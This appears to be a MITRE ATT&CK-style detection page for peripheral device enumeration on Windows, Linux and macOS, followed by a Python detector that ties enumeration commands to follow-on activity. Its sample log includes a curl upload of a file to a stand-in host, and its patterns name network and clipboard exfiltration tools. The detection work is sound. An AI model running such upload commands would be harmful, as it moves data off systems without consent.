DET0491 Peripheral Device Enumeration via System Utilities and API Calls
| Item | Value |
|---|---|
| ID | DET0491 |
| Version | 1.0 |
| Created | 21 October 2025 |
| Last Modified | 21 October 2025 |
Technique Detected: T1120 (Peripheral Device Discovery)
Analytics
Windows
AN1353
Suspicious enumeration of attached peripherals via WMI, PowerShell, or low-level API calls potentially chained with removable device interactions.
Log Sources
Mutable Elements
| Field | Description |
|---|---|
| CommandLineRegex | Regex patterns for device enumeration utilities (e.g., ‘Get-PnpDevice’, ‘wmic path Win32_USBController’) |
| TimeWindow | Time threshold for grouping device discovery with follow-on access or manipulation |
| UserContext | Filter privileged or service accounts known to legitimately execute enumeration scripts |
Linux
AN1354
Enumeration of USB and other peripheral hardware via udevadm, lshw, or the /sys and /proc interfaces, in proximity to collection or mounting behavior.
Log Sources
Mutable Elements
| Field | Description |
|---|---|
| ExecutableList | Set of binaries used for peripheral enumeration (e.g., ‘lshw’, ‘lsusb’, ‘udevadm’) |
| UserContext | Tuning based on which users/scripts are authorized to query device state |
macOS
AN1355
Execution of system utilities like ‘system_profiler’ and ‘ioreg’ to enumerate hardware components or USB devices, particularly if followed by clipboard, file, or network activity.
Log Sources
Mutable Elements
| Field | Description |
|---|---|
| BinaryList | Commands like ‘system_profiler SPUSBDataType’, ‘ioreg -p IOUSB’ that may indicate enumeration |
| TimeWindow | Temporal grouping of enumeration with follow-on activity (e.g., clipboard capture, exfiltration) |
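As an added example (not part of the DET0491 page or any ATT&CK tooling), the Python below applies the three analytics' mutable elements to constructed process records: it matches the enumeration commands named above (CommandLineRegex / ExecutableList / BinaryList), drops allowlisted accounts (UserContext), and alerts only when the same user performs follow-on mount, copy, network, or clipboard activity within the TimeWindow. The record format, the follow-on pattern set, and the allowlisted account name are assumptions.

```python
import re
from datetime import datetime, timedelta

# CommandLineRegex / ExecutableList / BinaryList: enumeration commands named on the page (regexes assumed)
ENUM_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"\bGet-PnpDevice\b",
    r"\bwmic\b.*\bWin32_USBController\b",
    r"\b(lsusb|lshw|udevadm)\b",
    r"\bsystem_profiler\b.*\bSPUSBDataType\b",
    r"\bioreg\b.*-p\s+IOUSB\b",
)]
# Follow-on activity the analytics chain with enumeration: mounting, file copy, network, clipboard (assumed set)
FOLLOWON_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"\bmount\b", r"\b(robocopy|xcopy|cp)\b", r"\b(curl|Invoke-WebRequest)\b", r"\bpbpaste\b",
)]
ALLOWED_USERS = {"svc_inventory"}   # UserContext: accounts authorized to query device state (assumed)
TIME_WINDOW = timedelta(minutes=5)  # TimeWindow: enumeration -> follow-on grouping threshold (assumed)

def parse(line):
    """Parse a constructed 'ISO timestamp|user|command line' record."""
    ts, user, cmd = line.split("|", 2)
    return datetime.fromisoformat(ts.strip()), user.strip(), cmd.strip()

def detect(lines, window=TIME_WINDOW, allowed=ALLOWED_USERS):
    """Return (user, enumeration_cmd, followon_cmd) for every enumeration by a
    non-allowlisted user that the same user follows with activity within `window`."""
    events = sorted((parse(l) for l in lines), key=lambda e: e[0])
    alerts = []
    for i, (t_enum, user, cmd) in enumerate(events):
        if user in allowed or not any(p.search(cmd) for p in ENUM_PATTERNS):
            continue
        for t_next, user2, cmd2 in events[i + 1:]:
            if t_next - t_enum > window:
                break  # events are time-sorted, so nothing later can fall inside the window
            if user2 == user and any(p.search(cmd2) for p in FOLLOWON_PATTERNS):
                alerts.append((user, cmd, cmd2))
                break
    return alerts

# Constructed sample records: one hit per analytic (Windows, macOS), one allowlisted user, one outside the window
SAMPLE_LOG = [
    "2025-10-21T09:00:00|alice|powershell.exe Get-PnpDevice -Class USB",
    "2025-10-21T09:02:10|alice|robocopy E:\\ C:\\staging /E",
    "2025-10-21T09:10:00|svc_inventory|wmic path Win32_USBController get DeviceID",
    "2025-10-21T09:30:00|bob|lsusb",
    "2025-10-21T09:50:00|bob|mount /dev/sdb1 /mnt/usb",
    "2025-10-21T10:00:00|carol|system_profiler SPUSBDataType",
    "2025-10-21T10:01:30|carol|curl -T /tmp/report.bin https://files.example.invalid/",
]
```

With the default five-minute window, bob's lsusb followed by a mount twenty minutes later does not alert; widening the window (or emptying the allowlist) changes the result, which is how the mutable elements are meant to be tuned.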